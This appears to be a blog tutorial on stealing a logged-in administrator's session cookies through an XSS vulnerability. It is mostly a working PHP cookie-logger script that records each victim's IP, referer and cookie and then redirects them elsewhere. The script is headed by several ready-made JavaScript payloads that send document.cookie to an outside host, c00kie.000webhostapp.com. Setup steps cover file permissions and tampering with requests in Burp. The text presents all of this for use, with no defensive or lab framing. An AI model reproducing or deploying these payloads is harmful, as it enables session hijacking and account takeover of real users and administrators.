Stealing Admin Cookies Tutorial


Now this assumes that an admin is currently logged in at the time you are running this.
It also assumes that you can execute JavaScript from the webpage in question and that the webpage has an XSS vulnerability.


Cookie Stealer PHP Script ####### 
Save it as coo.php and create a file empty named "cookies" and with permissions 622 (chmod 622 cookies)
Only works if the "HttpOnly" flag isn't set.
Use Burp to capture the traffic and replace the 'referrer' value for the plain UNurlencoded version (i.e the versions below) Do this for all relevant requests.
If this doesn't work try changing the User-agent value. 
The key is to play around with it a lot.
 two or three post / get requests and you should see the admin cookie.


<?php
#######################################################################################################################################
# USAGE                                                                                                                               
# SCRIPT MODE:                                                                                                                        
# <script language="Javascript"> document.location="https://c00kie.000webhostapp.com/coo.php?c="+document.cookie; </script>
#                                                                                                                                     
# TEST MODE:                                                                                                                          
# <script language="Javascript"> document.location='https://c00kie.000webhostapp.com/coo.php?c='+escape(document.cookie); </script>
#                                                                                                                                   
# MANUAL MODE:                                                                                                                        
# javascript:void(document.location='https://c00kie.000webhostapp.com/coo.php?c='+escape(document.cookie));
#                                     
# FLASHMOVIE MODE:                                                                                                                    
# getUrl("javascript:document.location='https://c00kie.000webhostapp.com/coo.php?c'=+document.cookie;");                             
#                                                                                                                                     
# Custom VERSION 1                                                                                                                    
# <script language="Javascript"> document.location="https://c00kie.000webhostapp.com/coo.php?c="+document.cookie; </script> #
#                                                                                                                                    
# Custom VERSION 2                                                                                                                    
# <script>document.write('<img src=\"https://c00kie.000webhostapp.com/coo.php?c='+document.cookie+'\"');</script>                    
#                                                                                                                                     
# Custom VERSION 3                                                                                                                    
# <script>document.write('<IMG SRC=\"https://c00kie.000webhostapp.com/coo.php?c='+document.cookie+'\">test</IMG>'); </script>        
#                                                                                                                                     
# Custom VERSION 4                                                                                                                    
# <script>(new Image()).src = "https://c00kie.000webhostapp.com/coo.php?c="+document.cookie;</script>                                 
#                                                                                                                                    
# Custom VERSION 5                                                                                                                    
# <script>window.location="https://c00kie.000webhostapp.com/coo.php?c="+document.cookie;</script>                                      
#Custom VERSION 6
# <script>new Image().src="https://c00kie.000webhostapp.com/coo.php?c="+document.cookie;</script>                                                                                                                                      
#######################################################################################################################################

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date = date("H:i dS F");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies', 'a');
fwrite($fp, "IP:      " . $ip . "\r\n");
fwrite($fp, "Date:    " .$date. "\r\n");
fwrite($fp, "Referer: " . $referer . "\r\n" );
fwrite($fp, "Cookie:  " . $cookie . "\r\n***************************************************************\r\n");
fclose($fp);
header ("Location:https://www.udemy.com/interactive-pentesting"); /* USE IF WANT TO REDIRECT TO ANOTHER PAGE */
?>

1 comment: